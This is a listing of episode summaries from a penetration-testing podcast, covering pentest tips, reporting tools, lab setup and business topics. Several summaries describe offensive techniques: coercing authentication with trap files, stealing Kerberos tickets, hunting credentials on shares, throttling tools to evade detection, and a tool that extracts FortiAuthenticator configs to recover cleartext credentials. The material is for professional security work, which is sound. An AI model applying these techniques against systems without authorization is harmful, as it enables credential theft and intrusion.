May 05, 2024Sadly, the Broadcom acquisition of VMWare has hit 7MinSec hard – we love running ESXi on our NUCs, but ESXi free is no longer available. To add insult to injury, our vCenter lab at OVHcloud HQ got a huge price gouge (due to license cost increase; not OVH's fault). Now we're exploring Proxmox as an alternative hypervisor, so we're using today's episode to kick off a series about the joys and pains of this migration process.
Duration: 00:16:317MS #621: Eating the Security Dog Food - Part 6
Apr 26, 2024Today we revisit a series about eating the security dog food – in other words, practicing what we preach as security gurus! Specifically we talk about:
We're going to get a third-party assessment on 7MinSec (the business) Tips for secure email backup/storage Limiting the retention of sensitive data you store in cloud places Duration: 00:23:377MS #620: Securing Your Mental Health - Part 5
Apr 21, 2024Today we're talking about tips to deal with stress and anxiety:
It sounds basic, but take breaks – and take them in a different place (don't just stay in the office and do more screen/doom-scrolling) I've never gotten to a place in my workload where I go "Ahhh, all caught up!" so I should stop striving to hit that invisible goal. Chiropractic and back massages have done wonders for the tightness in my neck and shoulders For me, video games where you punch and kick things relieves stress as well (including a specific game that's definitely not for kids Duration: 00:22:547MS #619: Tales of Pentest Pwnage – Part 56
Apr 14, 2024We did something crazy today and recorded an episode that was 7 minutes long! Today we talk about some things that have helped us out in recent pentests:
When using Farmer to create "trap" files that coerce authentication, I've found way better results using Windows Search Connectors (.searchConnector-ms) files This matrix of "can I relay this to that" has been super helpful, especially early in engagements Duration: 00:07:027MS #618: Writing Savage Pentest Reports with Sysreptor
Apr 05, 2024Today's episode is all about writing reports in Sysreptor. It's awesome! Main takeaways:
The price is free (they have a paid version as well)! You can send findings and artifacts directly to the report server using the reptor Python module Warning: Sysreptor only exports to PDF (no Word version option!) Sysreptor has helped us write reports faster without sacrificing quality Duration: 00:38:307MS #617: Tales of Pentest Pwnage – Part 55
Mar 29, 2024Hey friends, today we've got a tale of pentest pwnage that covers:
Passwords – make sure to look for patterns such as keyboard walks, as well as people who are picking passwords where the month the password changed is part of the password (say that five times fast)! Making sure you go after cached credentials Attacking SCCM – Misconfiguration Manager is an absolute gem to read, and The First Cred is the Deepest – Part 2 with Gabriel Prud'homme is an absolute gem to see. Also, check out sccmhunter for all your SCCM pwnage needs. Duration: 00:36:197MS #616: Interview with Andrew Morris of GreyNoise
Mar 22, 2024Hey friends, today we have a super fun interview with Andrew Morris of GreyNoise to share. Andrew chatted with us about:
Young Andrew's early adventures in hacking his school's infrastructure (note: don't try this at home, kids!) Meeting a pentester for the first time, and getting his first pentesting job Spinning up a box on the internet, having it get popped instantly, and wondering…"Are all these people trying to hack me?" Battling through a pentester's least favorite part of the job: THE REPORT! GreyNoise's origin story How to build a better honeypot/honeynet Duration: 00:59:047MS #615: Tales of Pentest Pwnage – Part 54
Mar 19, 2024Hey friends, sorry I'm so late with this (er, last) week's episode but I'm back! Today is more of a prep for tales of pentest pwnage, but topics covered include:
Make sure when you're snafflin' that you check for encrypted/obfuscated logins and login strings – it might not be too tough to decrypt them! On the defensive side, I've found myself getting *blocked* doing things like SharpHound runs, Snaffler, PowerHuntShares, etc. Look through the readme files for these tools and try cranking down the intensity/threads of these tools and you might fly under the radar. Duration: 00:21:487MS #614: How to Succeed in Business Without Really Crying - Part 16
Mar 08, 2024How much fun I had attending and speaking at Netwrix Connect Being a sales guy in conference situations without being an annoying sales guy in conference situations A recap of the talk I co-presented about high profile breaches and lessons we can learn from them
Duration: 00:36:217MS #613: Tales of Pentest Pwnage – Part 53
Mar 01, 2024Today's tale of pentest covers:
Farming for credentials (don't forget to understand trusted zones to make this happen properly!) Snaffling for juice file shares Stealing Kerberos tickets with Rubeus Duration: 00:33:247MS #612: Pentestatonix - Part 2
Feb 25, 2024Hello friends, we're still deep in the podcast trenches this quarter and wanted to share some nuggets of cool stuff we've been learning along the way:
Snaffler – pairs nicely with PowerHuntShares to find juicy tidbits within file/folder shares Group3r – helps you find interesting and potentially abusable Group Policy Object configurations Farmer – totally awesome toolkit for dropping tricky files on shares that will do things like fire up the Webclient service for any system browsing the share (doesn't require admin rights!) or coaxing a system into authenticating with you via HTTP or SMB Duration: 00:32:237MS #611: Pentestatonix
Feb 19, 2024Hey friends, sorry for the late episode but I've been deep in the trenches of pentest adventures. I'll do a more formal tale of pentest pwnage when I come up for air, but for now I wanted to share some tips I've picked up from recent engagements:
GraphRunner - awesome PowerShell toolkit for interacting with Microsoft Graph API. From a pentesting perspective, it may help you bridge the "gap" between LAN-side AD and Azure and find some goodies - like files with and XSLX extension containing the word password. PowerUpSQL -I typically use this to make SQL servers co... Duration: 00:34:037MS #610: DIY Pentest Dropbox Tips – Part 9
Feb 09, 2024Hey friends, today we cover a funstrating (that's fun + frustrating) issue we had with our DIY pentest dropboxes. TLDL:
The preseed file got jacked because I had a bad Kali metapackage in it. While I was tinkering around with preseed files, I decided it would be more efficient to have the Kali ISO call that preseed file directly over HTTP (rather than make a new ISO every time I made a preseed change). To accomplish that: Mount the Kali ISO Explore to isolinux > txt.cfg Modify the txt.cfg to include a custom boot option that calls... Duration: 00:20:25
7MS #609: First Impressions of Sysreptor
Feb 02, 2024Hey friends, today is a first impressions episode about Sysreptor, which according to their GitHub page, is a fully customisable, offensive security reporting solution designed for pentesters, red teamers and other security-related people alike. It is easy to stand up with Docker, has built-in MFA and a great hybrid WYSIWYG/code editor. The only scary part? There is no export to Word (insert suspenseful music here!) - your reports just go right to PDF, friends! The killer feature for us, though, is the ability to create reports from the command line and send files, notes and findings to Sysreptor auto...
Duration: 00:30:517MS #608: New Tool Release - EvilFortiAuthenticator
Jan 26, 2024Hey friends, today our pal Hackernovice joins us for a tool (actually two tools!) release party:
EvilFortiAuthenticator - it's like a regular FortiAuthenticator, but evil. This tool allows you to capture the FortiAuthenticator API and subsequently steal the entire device's config, subsequently allowing you to restore the config to a second server and potentially steal cleartext Active Directory creds and SMTP accounts! We talk about BulletsPassView - a tool that originially allowed us to simply unmask the "hidden" API key in the FortiAuthenticator client (this did NOT work in the latest version of FAC). Once you get the API... Duration: 00:43:467MS #607: How to Succeed in Business Without Really Crying - Part 15
Jan 19, 2024Today we talk about some business-y things like:
A pre first impressions opinion on Sysreptor
Why I'm not worried about AI replacing manual pentesting (yet)
My struggle with going "full CEO" vs. staying in the weeds and working on hands-on security projects
Duration: 00:39:547MS #606: Hacking OWASP Juice Shop (2024 edition)
Jan 12, 2024Today our pals Bjorn Kimminich from OWASP and Paul from Project7 and TheUnstoppables.ai join us as we kick off a series all about hacking the OWASP Juice Shop, which is "probably the most modern and sophisticated insecure web application!" We got a few wins on the Juice Shop score board today:
Found the score board Bullied the chatbot Fired a DOM XSS Located a confidential document Gave the Juice Shop a devastating zero stars review Fired a DOM XSS which played the OWASP Juice Shop Jingle Duration: 00:29:51